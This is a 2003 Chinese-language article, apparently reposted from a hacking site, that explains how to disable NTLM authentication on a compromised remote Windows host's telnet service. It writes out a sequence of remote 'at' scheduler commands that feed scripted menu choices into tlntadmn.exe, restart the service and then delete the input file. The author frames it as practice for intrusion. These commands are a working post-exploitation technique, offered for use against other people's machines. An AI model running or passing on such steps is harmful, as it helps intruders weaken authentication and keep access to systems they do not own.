不需要任何工具，遠(yuǎn)程屏蔽telnet服務(wù)的ntlm認(rèn)證 
--------------------------------------------------------------------------------
 來(lái)源:不明  類(lèi)別:安全文獻(xiàn)  日期:2003-10-29 23:42:18  今日/總瀏覽: 9/1666   


 
很多人獲得上傳文件的權(quán)限和管理員權(quán)限以后想啟動(dòng)遠(yuǎn)程的tlelnet服務(wù)，但是卻碰到
討厭的NTLM認(rèn)證，對(duì)于這種情況，我們很多時(shí)候就采用上傳文件（比如NTLM.exe），然后at遠(yuǎn)程定時(shí)執(zhí)行，如果手頭上沒(méi)有這樣的工具怎么辦呢？
可以這么做:
大家可以看一下win2000和nt4自帶tlntadmn這個(gè)命令，他是用來(lái)控制臺(tái)修改telnet設(shè)置的，很可惜這是一個(gè)控制臺(tái)的交互式工具，所以at命令沒(méi)有辦法直接調(diào)用。
現(xiàn)在我們執(zhí)行一下tlntadmn，然后按照以下的順序操作
停止服務(wù)(5)->更改設(shè)置(3)->NTLM(7)->確認(rèn)更改(y)->修改NTLM當(dāng)前值(0)->再次確認(rèn)(y)->退出菜單(0)->啟動(dòng)服務(wù)(4)->退出程序(0)
現(xiàn)在大家記住了吧，先后順序是5(回車(chē))3(回車(chē))7(回車(chē))y(回車(chē))0(回車(chē))y(回車(chē))0(回車(chē))4(回車(chē))0(回車(chē))
線在我們這么做
at \\ip time "echo 5 > c:\t.txt"
at \\ip time "echo 3 >> c:\t.txt"
at \\ip time "echo 7 >> c:\t.txt"
at \\ip time "echo y >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "echo y >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "echo 4 >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"
at \\ip time "del c:\t.txt /f"
呵呵按照上面的順序一步一步執(zhí)行
當(dāng)然你本地做一個(gè)t.txt文件也可以，內(nèi)容如下:
5
3
7
y
0
y
0
4
0
每個(gè)字符后面要加回車(chē)，然后copy t.txt \\ip\c$
然后再
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"
at \\ip time "del c:\t.txt /f"
很簡(jiǎn)單的dos重定向原理，t.txt就相當(dāng)于手工輸入一系列的操作，完成tlntadmn的交互
呵呵

當(dāng)然，你們可以在本地試驗(yàn)好以后再發(fā)到遠(yuǎn)程主機(jī)去
我但是勸大家練習(xí)入侵的時(shí)候盡量不要使用工具，這樣對(duì)自己沒(méi)有幫助的

 
小鳳居 版權(quán)所有
Copyright ? 2000 - 2003 www.chinesehack.org. All Rights Reserved